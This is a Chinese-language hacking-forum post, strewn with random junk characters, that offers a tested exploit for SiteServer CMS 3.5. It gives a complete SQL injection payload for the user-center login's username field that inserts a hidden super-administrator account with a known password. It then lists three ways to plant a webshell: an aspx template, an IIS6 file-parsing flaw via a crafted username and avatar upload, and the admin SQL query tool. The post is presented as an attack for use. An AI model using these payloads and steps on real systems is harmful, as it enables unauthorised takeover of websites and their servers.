经测试秒杀最新的3.5版
' N" Q) z4 Z. P4 a9 Z" r
( F; D. X& t$ f% t$ mstieserver官网:www.siteserver.cn4 D; A8 T5 p I& a* K _! K K/ [
9 \$ h) i5 f' W, U' {( ]( V 6 ?; C7 @" D; ]/ D- X& e
k5 i/ Z' |. K6 ]8 r1 d
EXP:% Z9 J- n G6 p) |/ d: D8 F. `
7 z5 _5 W9 X" t. a直接访问UserCenter/login.aspx+ O. n3 X o+ T5 k1 x0 |
/ b& I! q5 i4 A, m( X
. i& V- z. H* q n1 `8 Q4 F5 Y) g, ~+ ?$ o" `
用户名处输入:5 s9 Y( c. P8 M; m/ P1 m. h" `
( Y/ d1 C+ C5 k+ g) w123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--. H8 G) ^! `3 f3 ]% ]* M
$ j5 r4 q) `* I. j 5 w9 F) p; t6 \0 j |
3 Z4 |8 O1 U" I0 o( [9 E( }% e
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。 ]" g& r& h. ]4 x' g$ L
/ L: O5 A; b: Z1 }* K; m
% ^6 v# ]% _% u$ s2 s$ t
% r6 Z" i. ?- x6 m: o! q
之后再访问后台SiteServer/login.aspx用插入的用户登陆9 c/ m( B3 ~# W/ C
1 `0 P: ?1 j5 g/ A0 w7 m' b
/ ^7 Z7 R4 Q# `- T B
~# c! V$ \& i4 ^0 }
后台拿webshell的三种方法:
& M9 a0 R+ ?9 Z! c+ A; @, a, ~ I( j+ Q$ f. m& X Q- ? T
一、/ }# u+ _' _, q! B, w
9 o5 Y- g8 b! p5 p+ u
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx: u9 D+ I2 y6 ~3 d( j
2 @. ~2 b6 @- w+ _+ R二、
, N1 X/ v* D V+ z- |+ r( H- a2 H0 {& t; g5 G6 E6 S0 ~* }. R
成员权限-》添加用户-》用户名为:1.asp
; P, H3 z) p6 x5 U3 R5 Q3 h k4 C5 J& u; y3 v4 Z. e
http://127.0.0.1/usercenter/
) |+ o6 {$ Z- G9 e+ v9 B/ S! n) ~& s3 D1 a$ @. m. p9 s
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell. R3 e: Y$ x. J# z: j
& E$ m$ {$ |8 y8 y$ a" q& y. t
(ps:后台添加用户时不会验证是否含有非法字符)/ A& G5 p- w9 d* M" d& a1 f
4 X0 l) W# L* a三、: L: z3 q" G5 u, w& A$ u; U
8 [5 O) {% K3 M) b系统工具-》实用工具-》机器参数查看
% H2 T2 l, ^# _ t2 Y# u可以看到数据库类型、名称,WEB路径! u, O6 E7 X! _, C c' N" O! V. z
- K3 X0 A% k( G
系统工具-》数据库工具-》SQL语句查询
5 b0 J! l' v' |( y这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
0 a/ |" K+ [$ n% m$ d
- K L) C, K& w |